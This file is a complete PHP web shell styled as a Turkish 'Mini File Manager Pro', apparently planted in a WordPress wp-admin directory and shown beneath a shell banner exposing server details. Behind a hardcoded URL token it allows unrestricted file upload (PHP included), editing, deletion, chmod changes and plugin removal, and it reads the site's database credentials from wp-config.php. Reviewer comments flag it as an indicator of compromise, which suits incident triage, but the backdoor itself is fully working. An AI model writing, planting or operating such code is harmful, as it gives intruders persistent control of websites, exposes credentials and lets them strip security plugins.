| Server IP : 2.57.91.60 / Your IP :
216.73.217.116 [
Web Server : LiteSpeed System : Linux nl-srv-web1124.main-hosting.eu 4.18.0-553.121.1.lve.el8.x86_64 #1 SMP Thu Apr 30 16:40:41 UTC 2026 x86_64 User : u964240598 ( 964240598) PHP Version : 8.4.19 Disable Function : system, exec, shell_exec, passthru, mysql_list_dbs, ini_alter, dl, symlink, link, chgrp, leak, popen, apache_child_terminate, virtual, mb_send_mail Domains : 2 Domains MySQL : OFF | cURL : ON | WGET : ON | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : /home/u964240598/public_html/jobs/wp-admin/ |
<?php
/********************
* SETTINGS
********************/
// NOTE(review): a standalone file manager that sits beside WordPress core files
// and is gated only by a query-string token matches the usual shape of a web
// shell. Treat its presence as an indicator of compromise; confirm against the
// site's deployment history.
// Static shared secret: the only access control in this script. It travels in
// the URL, so requests to this file carrying "token=" are normally visible in
// the web server's access log.
$SECRET_TOKEN = 'allah'; // change this
// All file operations below are rooted at the parent of this script's directory.
$BASE_DIR = realpath(__DIR__ . '/../'); // target: one directory above wp-admin
// Gate: without the exact token the response is a bare 403 and nothing else runs.
if (!isset($_GET['token']) || $_GET['token'] !== $SECRET_TOKEN) {
http_response_code(403);
exit('Forbidden');
}
/********************
* HELPER FUNCTIONS
********************/
/**
 * HTML-escape a value for output in the page.
 *
 * null is treated as an empty string; both quote styles are encoded
 * (ENT_QUOTES) and the input is interpreted as UTF-8.
 */
function h($s)
{
    $text = $s ?? '';

    return htmlspecialchars($text, ENT_QUOTES, 'UTF-8');
}
/**
 * Return the last four octal digits of a path's mode bits, e.g. "0644".
 */
function perms($file)
{
    $octal = sprintf('%o', fileperms($file));

    return substr($octal, -4);
}
// Recursive directory removal
/**
 * Delete a directory and everything below it.
 *
 * Returns false when $dir is not a directory, true otherwise. The results of
 * unlink() and rmdir() are not checked, so true does not prove that every
 * entry was actually removed.
 */
function rrmdir($dir) {
    if (!is_dir($dir)) {
        return false;
    }

    foreach (scandir($dir) as $entry) {
        // Skip the self and parent links that scandir() always reports.
        if ($entry === '.' || $entry === '..') {
            continue;
        }

        $child = $dir . DIRECTORY_SEPARATOR . $entry;
        if (is_dir($child)) {
            rrmdir($child);
        } else {
            unlink($child);
        }
    }

    rmdir($dir);

    return true;
}
// Fetch the active WordPress plugins
/**
 * Read the `active_plugins` option directly from the WordPress database.
 *
 * The database name, user, password, host and table prefix are pulled out of
 * $baseDir/wp-config.php with regular expressions, i.e. the script reuses the
 * site's own database credentials without loading WordPress.
 *
 * Returns the unserialized option value when it is an array, otherwise [].
 * Any exception from the connection or query is swallowed and yields [].
 */
function getActivePlugins($baseDir) {
$plugins = []; // never used again in this function
$configFile = $baseDir . '/wp-config.php';
if (!file_exists($configFile)) return [];
// Read wp-config.php and extract the DB settings
$config = file_get_contents($configFile);
// Only single-quoted define('NAME', 'value') forms are matched.
preg_match("/define\(\s*'DB_NAME',\s*'([^']+)'\s*\)/", $config, $db);
preg_match("/define\(\s*'DB_USER',\s*'([^']+)'\s*\)/", $config, $user);
preg_match("/define\(\s*'DB_PASSWORD',\s*'([^']+?)'\s*\)/", $config, $pass);
preg_match("/define\(\s*'DB_HOST',\s*'([^']+)'\s*\)/", $config, $host);
preg_match("/table_prefix\s*=\s*'([^']+)'/", $config, $prefix);
// NOTE(review): only $db and $user are checked; $host[1] and $pass[1] are read
// below even if their patterns did not match.
if (empty($db) || empty($user)) return [];
try {
$pdo = new PDO("mysql:host={$host[1]};dbname={$db[1]};charset=utf8mb4", $user[1], $pass[1]);
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$tblPrefix = $prefix[1] ?? 'wp_';
// The table prefix taken from the config file is interpolated into the SQL text;
// the statement has no bound parameters.
$stmt = $pdo->prepare("SELECT option_value FROM {$tblPrefix}options WHERE option_name = 'active_plugins'");
$stmt->execute();
$result = $stmt->fetch(PDO::FETCH_ASSOC);
if ($result) {
// NOTE(review): unserialize() is applied to the stored value without an
// allowed_classes restriction.
$active = unserialize($result['option_value']);
return is_array($active) ? $active : [];
}
} catch (Exception $e) {
// Connection and query errors are discarded silently.
return [];
}
return [];
}
/********************
* OPERATIONS
********************/
// Everything below runs only after the token check near the top of the file.
$msg = []; // status lines rendered at the top of the page
$mode = $_GET['mode'] ?? 'files'; // view selector; compared against 'files' and 'edit' below
$editFile = $_GET['edit'] ?? ''; // path (relative to $BASE_DIR) of the file to open in the editor
$wpMode = isset($_GET['wp_plugins']); // presence of the parameter switches to the plugin view
// Save file
// Overwrites an existing file directly inside $BASE_DIR with the raw POST body.
// basename() drops any directory part of file_path; realpath() and is_file()
// mean the target must already exist as a regular file. Nothing is reported
// when those checks fail.
// NOTE(review): containment is a plain string-prefix test on the resolved path.
// NOTE(review): the edit view reads $_GET['edit'] without basename(), so for a
// nested path the file displayed and the file written here are not the same.
if (isset($_POST['save_file'], $_POST['file_path'], $_POST['content'])) {
$file = realpath($BASE_DIR . '/' . basename($_POST['file_path']));
if ($file && str_starts_with($file, $BASE_DIR) && is_file($file)) {
if (file_put_contents($file, $_POST['content']) !== false) {
$msg[] = "Dosya kaydedildi: " . basename($file);
} else {
$msg[] = "Kaydetme başarısız!";
}
}
}
// Delete folder/file (general)
// Removes one entry of $BASE_DIR: directories recursively via rrmdir(), files
// via unlink(). The name is reduced with basename() and must resolve through
// realpath(), so the entry has to exist.
if (isset($_POST['delete_path'])) {
$path = realpath($BASE_DIR . '/' . basename($_POST['delete_path']));
if ($path && str_starts_with($path, $BASE_DIR)) {
if (is_dir($path)) {
// rrmdir() returns true for any existing directory, so the failure branch
// is only reached if the path stops being a directory in between.
if (rrmdir($path)) $msg[] = "Klasör silindi: " . basename($path);
else $msg[] = "Klasör silinemedi!";
} else {
// @ hides the PHP warning; failure is reported through $msg only.
if (@unlink($path)) $msg[] = "Dosya silindi: " . basename($path);
else $msg[] = "Dosya silinemedi!";
}
}
}
// CHMOD
// Changes the mode of one entry directly inside $BASE_DIR (file or directory).
if (isset($_POST['chmod'], $_POST['path'])) {
$path = realpath($BASE_DIR.'/'.basename($_POST['path']));
// The submitted string is parsed as octal; no range check is applied to it.
$modeChmod = octdec($_POST['chmod']);
if ($path && str_starts_with($path, $BASE_DIR)) {
// @ hides the PHP warning; the outcome is reported through $msg only.
if (@chmod($path, $modeChmod)) $msg[]="CHMOD güncellendi";
else $msg[]="CHMOD başarısız";
}
}
// Upload
// Stores every uploaded file directly in $BASE_DIR under its client-supplied
// base name.
// NOTE(review): there is no extension, type or size check, so any file,
// PHP scripts included, ends up in the base directory; move_uploaded_file()
// replaces an existing file of the same name. During triage, compare the
// directory contents against a known-good copy of the site.
if (!empty($_FILES['files']['name'][0])) {
foreach ($_FILES['files']['name'] as $i=>$name) {
$tmp = $_FILES['files']['tmp_name'][$i];
// Skip entries that are not genuine HTTP uploads.
if (!is_uploaded_file($tmp)) continue;
$safe = basename($name); // strips directory components only
$dst = $BASE_DIR.'/'.$safe;
if (move_uploaded_file($tmp, $dst)) $msg[]="$safe yüklendi";
else $msg[]="$safe yüklenemedi";
}
}
// WordPress plugin deletion
// Recursively removes one directory under wp-content/plugins/, selected by the
// base name in delete_plugin. The database is not touched, so the plugin can
// remain listed in active_plugins after its files are gone.
// NOTE(review): any plugin directory can be removed this way, security plugins
// included; a plugin that is listed as active but missing on disk is worth
// checking during incident triage.
if (isset($_POST['delete_plugin'])) {
$pluginDir = realpath($BASE_DIR . '/wp-content/plugins/' . basename($_POST['delete_plugin']));
if ($pluginDir && str_starts_with($pluginDir, realpath($BASE_DIR . '/wp-content/plugins/'))) {
if (rrmdir($pluginDir)) {
$msg[] = "Plugin silindi: " . basename($pluginDir);
} else {
$msg[] = "Plugin silinemedi!";
}
}
}
// Create new folder
// Creates a directory directly inside $BASE_DIR with mode 0755 if nothing of
// that name exists yet.
if (isset($_POST['new_folder'])) {
$newDir = $BASE_DIR . '/' . basename($_POST['new_folder']);
if (!file_exists($newDir)) {
// The result of mkdir() is not checked; the success message is added either way.
mkdir($newDir, 0755, true);
$msg[] = "Klasör oluşturuldu: " . basename($_POST['new_folder']);
}
}
/********************
* DATA PREPARATION
********************/
// The database is queried only when the plugin view was requested.
$activePlugins = [];
if ($wpMode) {
$activePlugins = getActivePlugins($BASE_DIR);
}
// File content for edit mode
// $editFile is used as given (no basename()), so files in sub-directories of
// $BASE_DIR can be opened too. Containment is a string-prefix test on the
// realpath() result; wp-config.php, which getActivePlugins() expects in
// $BASE_DIR, is within reach of this read.
$fileContent = '';
if ($mode === 'edit' && $editFile) {
$editPath = realpath($BASE_DIR . '/' . $editFile);
if ($editPath && str_starts_with($editPath, $BASE_DIR) && is_file($editPath)) {
$fileContent = file_get_contents($editPath);
} else {
// Unresolvable or non-file target: fall back to the listing without a message.
$mode = 'files';
}
}
?>
<!doctype html>
<html lang="tr">
<head>
<meta charset="utf-8">
<title>Mini File Manager Pro</title>
<meta name="viewport" content="width=device-width,initial-scale=1">
<style>
* { box-sizing: border-box; }
body {
font-family: system-ui, -apple-system, sans-serif;
background: #0f172a;
color: #e5e7eb;
margin: 0;
padding: 20px;
line-height: 1.6;
}
.box {
max-width: 1200px;
margin: auto;
background: #1e293b;
padding: 24px;
border-radius: 12px;
box-shadow: 0 25px 50px -12px rgba(0, 0, 0, 0.5);
}
h1 {
margin: 0 0 20px 0;
font-size: 24px;
color: #f8fafc;
}
.top-bar {
display: flex;
gap: 12px;
margin-bottom: 24px;
flex-wrap: wrap;
align-items: center;
padding-bottom: 20px;
border-bottom: 1px solid #334155;
}
.btn {
padding: 10px 16px;
border-radius: 8px;
border: none;
cursor: pointer;
font-size: 14px;
font-weight: 600;
transition: all 0.2s;
text-decoration: none;
display: inline-flex;
align-items: center;
gap: 6px;
}
.btn:hover { transform: translateY(-1px); box-shadow: 0 4px 12px rgba(0,0,0,0.3); }
.btn-primary { background: #3b82f6; color: white; }
.btn-success { background: #10b981; color: white; }
.btn-danger { background: #ef4444; color: white; }
.btn-warning { background: #f59e0b; color: #000; }
.btn-secondary { background: #475569; color: white; }
.btn.active { ring: 2px solid #60a5fa; outline: 2px solid #60a5fa; }
.msg {
margin: 12px 0;
padding: 12px 16px;
border-radius: 8px;
background: #064e3b;
color: #6ee7b7;
border: 1px solid #059669;
}
.msg.error { background: #450a0a; color: #fca5a5; border-color: #dc2626; }
table {
width: 100%;
border-collapse: collapse;
margin-top: 16px;
background: #0f172a;
border-radius: 8px;
overflow: hidden;
}
th, td {
padding: 14px;
text-align: left;
border-bottom: 1px solid #334155;
}
th {
background: #1e293b;
color: #94a3b8;
font-weight: 600;
text-transform: uppercase;
font-size: 12px;
letter-spacing: 0.5px;
}
td { font-size: 14px; }
tr:hover td { background: #1e293b; }
.badge {
padding: 4px 10px;
border-radius: 20px;
font-size: 12px;
font-weight: 600;
display: inline-block;
}
.badge-success { background: #059669; color: white; }
.badge-danger { background: #dc2626; color: white; }
.badge-info { background: #0369a1; color: white; }
.actions { display: flex; gap: 8px; }
.actions form { display: inline; }
.editor {
margin-top: 20px;
}
.editor textarea {
width: 100%;
min-height: 500px;
background: #0f172a;
color: #e5e7eb;
border: 1px solid #334155;
border-radius: 8px;
padding: 16px;
font-family: 'Consolas', 'Monaco', monospace;
font-size: 14px;
line-height: 1.5;
resize: vertical;
}
.editor-header {
display: flex;
justify-content: space-between;
align-items: center;
margin-bottom: 12px;
padding: 12px;
background: #0f172a;
border-radius: 8px;
border: 1px solid #334155;
}
.plugin-grid {
display: grid;
grid-template-columns: repeat(auto-fill, minmax(300px, 1fr));
gap: 16px;
margin-top: 20px;
}
.plugin-card {
background: #0f172a;
border: 1px solid #334155;
border-radius: 10px;
padding: 16px;
position: relative;
transition: all 0.2s;
}
.plugin-card:hover { border-color: #475569; transform: translateY(-2px); }
.plugin-card.active { border-left: 4px solid #10b981; }
.plugin-card.inactive { border-left: 4px solid #6b7280; }
.plugin-name {
font-weight: 600;
color: #f8fafc;
margin-bottom: 4px;
font-size: 16px;
}
.plugin-status {
font-size: 12px;
margin-bottom: 12px;
}
.plugin-path {
font-size: 12px;
color: #64748b;
word-break: break-all;
margin-bottom: 12px;
}
.upload-area {
border: 2px dashed #475569;
border-radius: 8px;
padding: 20px;
text-align: center;
margin-bottom: 20px;
transition: all 0.2s;
}
.upload-area:hover { border-color: #3b82f6; background: #1e293b; }
.new-folder-form {
display: flex;
gap: 8px;
margin-bottom: 20px;
}
.new-folder-form input {
flex: 1;
padding: 10px;
background: #0f172a;
border: 1px solid #334155;
border-radius: 6px;
color: white;
}
input[type="text"].chmod-input {
width: 70px;
padding: 6px;
background: #0f172a;
border: 1px solid #334155;
border-radius: 4px;
color: white;
text-align: center;
}
.empty-state {
text-align: center;
padding: 60px 20px;
color: #64748b;
}
.empty-state svg {
width: 64px;
height: 64px;
margin-bottom: 16px;
opacity: 0.3;
}
</style>
</head>
<body>
<div class="box">
<h1>🚀 Mini File Manager Pro</h1>
<?php foreach($msg as $m): ?>
<div class="msg"><?=h($m)?></div>
<?php endforeach; ?>
<!-- ÜST NAVİGASYON -->
<div class="top-bar">
<a href="?token=<?=$SECRET_TOKEN?>&mode=files" class="btn btn-primary <?=($mode=='files' && !$wpMode)?'active':''?>">
📁 Dosyalar
</a>
<a href="?token=<?=$SECRET_TOKEN?>&wp_plugins=1" class="btn btn-success <?=$wpMode?'active':''?>">
🔌 WP Pluginler
</a>
<?php if ($mode === 'files' && !$wpMode): ?>
<form method="post" class="new-folder-form" style="margin:0;margin-left:auto;flex:0 0 auto;">
<input type="text" name="new_folder" placeholder="Yeni klasör adı..." required>
<button type="submit" class="btn btn-secondary">📂 Oluştur</button>
</form>
<?php endif; ?>
<?php if ($editFile): ?>
<a href="?token=<?=$SECRET_TOKEN?>&mode=files" class="btn btn-secondary" style="margin-left: auto;">
← Listeye Dön
</a>
<?php endif; ?>
</div>
<?php if ($mode === 'edit' && $editFile): ?>
<!-- DOSYA EDİTÖRÜ -->
<div class="editor">
<div class="editor-header">
<div>
<strong>✏️ <?=h($editFile)?></strong>
<span class="badge badge-info" style="margin-left: 8px;"><?=perms($editPath)?></span>
</div>
<div style="color: #94a3b8; font-size: 14px;">
<?=number_format(filesize($editPath))?> bytes
</div>
</div>
<form method="post">
<input type="hidden" name="file_path" value="<?=h($editFile)?>">
<textarea name="content"><?=h($fileContent)?></textarea>
<div style="margin-top: 16px; display: flex; gap: 12px;">
<button type="submit" name="save_file" class="btn btn-success">💾 Kaydet</button>
<a href="?token=<?=$SECRET_TOKEN?>&mode=files" class="btn btn-secondary">İptal</a>
</div>
</form>
</div>
<?php elseif ($wpMode): ?>
<!-- WORDPRESS PLUGIN YÖNETİMİ -->
<?php
// Plugin directories are enumerated from disk, not from the database.
$pluginsDir = $BASE_DIR . '/wp-content/plugins';
if (!is_dir($pluginsDir)): ?>
<div class="msg error">WordPress plugins dizini bulunamadı!</div>
<?php else:
// Keep sub-directories only; loose files inside plugins/ are not listed.
$pluginFolders = array_filter(glob($pluginsDir . '/*'), 'is_dir');
// $pluginNames is not referenced again in the code shown.
$pluginNames = array_map('basename', $pluginFolders);
?>
<div style="margin-bottom: 20px; color: #94a3b8;">
<strong>💡 Bilgi:</strong> Aktif pluginler yeşil, pasif olanlar gri renkle işaretlidir.
Silme işlemi geri alınamaz!
</div>
<?php if (empty($pluginFolders)): ?>
<div class="empty-state">
<svg fill="none" stroke="currentColor" viewBox="0 0 24 24"><path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" d="M20 13V6a2 2 0 00-2-2H6a2 2 0 00-2 2v7m16 0v5a2 2 0 01-2 2H6a2 2 0 01-2-2v-5m16 0h-2.586a1 1 0 00-.707.293l-2.414 2.414a1 1 0 01-.707.293h-3.172a1 1 0 01-.707-.293l-2.414-2.414A1 1 0 006.586 13H4"></path></svg>
<p>Plugin bulunamadı</p>
</div>
<?php else: ?>
<div class="plugin-grid">
<?php foreach ($pluginFolders as $folder):
$name = basename($folder);
// A folder counts as active when active_plugins contains "<dir>/<dir>.php" or
// any entry whose first path segment equals <dir>. Both lookups use loose
// comparison (in_array without the strict flag).
$isActive = in_array($name . '/' . $name . '.php', $activePlugins) ||
in_array($name, array_map(function($p) { return explode('/', $p)[0]; }, $activePlugins));
// Try to read the plugin's metadata
// Only "<dir>/<dir>.php" is inspected; otherwise the folder name is displayed.
$pluginFile = $folder . '/' . $name . '.php';
$pluginName = $name;
if (file_exists($pluginFile)) {
$content = file_get_contents($pluginFile);
// The first "Plugin Name:" line of the file supplies the display name.
if (preg_match('/Plugin Name:\s*(.+)/i', $content, $match)) {
$pluginName = trim($match[1]);
}
}
?>
<div class="plugin-card <?= $isActive ? 'active' : 'inactive' ?>">
<div class="plugin-name"><?=h($pluginName)?></div>
<div class="plugin-status">
<?php if ($isActive): ?>
<span class="badge badge-success">🟢 AKTİF</span>
<?php else: ?>
<span class="badge">⚪ PASİF</span>
<?php endif; ?>
</div>
<div class="plugin-path"><?=h($name)?>/</div>
<form method="post" onsubmit="return confirm('<?=h($pluginName)?> silinsin mi? Bu işlem geri alınamaz!')">
<input type="hidden" name="delete_plugin" value="<?=h($name)?>">
<button type="submit" class="btn btn-danger" style="width: 100%;">
🗑️ Klasörü Sil
</button>
</form>
</div>
<?php endforeach; ?>
</div>
<?php endif; ?>
<?php endif; ?>
<?php else: ?>
<!-- DOSYA LİSTESİ -->
<form method="post" enctype="multipart/form-data" class="upload-area">
<input type="file" name="files[]" multiple style="margin-bottom: 12px;">
<br>
<button type="submit" class="btn btn-primary">📤 Dosya(lar) Yükle</button>
</form>
<table>
<thead>
<tr>
<th width="40%">Ad</th>
<th width="10%">Tür</th>
<th width="15%">Boyut</th>
<th width="15%">CHMOD</th>
<th width="20%">İşlemler</th>
</tr>
</thead>
<tbody>
<?php
// List the direct children of $BASE_DIR, without the "." and ".." entries.
$items = array_diff(scandir($BASE_DIR), ['.','..']);
// Directories first
// Within each group the order is case-insensitive by name.
usort($items, function($a, $b) use ($BASE_DIR) {
$aIsDir = is_dir($BASE_DIR.'/'.$a);
$bIsDir = is_dir($BASE_DIR.'/'.$b);
if ($aIsDir === $bIsDir) return strcasecmp($a, $b);
return $bIsDir ? 1 : -1;
});
foreach ($items as $it):
$path = $BASE_DIR.'/'.$it;
$isDir = is_dir($path);
// The PHP badge is shown only for a lowercase "php" extension (strict comparison).
$isPhp = !$isDir && pathinfo($it, PATHINFO_EXTENSION) === 'php';
?>
<tr>
<td>
<?php if ($isDir): ?>📁<?php else: ?>📄<?php endif; ?>
<?=h($it)?>
<?php if ($isPhp): ?><span class="badge badge-info" style="margin-left: 8px;">PHP</span><?php endif; ?>
</td>
<td><?=$isDir?'Klasör':'Dosya'?></td>
<td><?=$isDir?'-':number_format(filesize($path)).' B'?></td>
<td>
<form method="post" class="actions">
<input type="hidden" name="path" value="<?=h($it)?>">
<input type="text" name="chmod" value="<?=perms($path)?>" class="chmod-input">
<button type="submit" class="btn btn-warning" style="padding: 6px 10px;">Uygula</button>
</form>
</td>
<td>
<div class="actions">
<?php if (!$isDir): ?>
<a href="?token=<?=$SECRET_TOKEN?>&mode=edit&edit=<?=urlencode($it)?>" class="btn btn-primary" style="padding: 6px 12px;">
✏️ Düzenle
</a>
<?php endif; ?>
<form method="post" onsubmit="return confirm('<?=h($it)?> silinsin mi?')">
<input type="hidden" name="delete_path" value="<?=h($it)?>">
<button type="submit" class="btn btn-danger" style="padding: 6px 12px;">
🗑️ Sil
</button>
</form>
</div>
</td>
</tr>
<?php endforeach; ?>
</tbody>
</table>
<?php endif; ?>
</div>
</body>
</html>
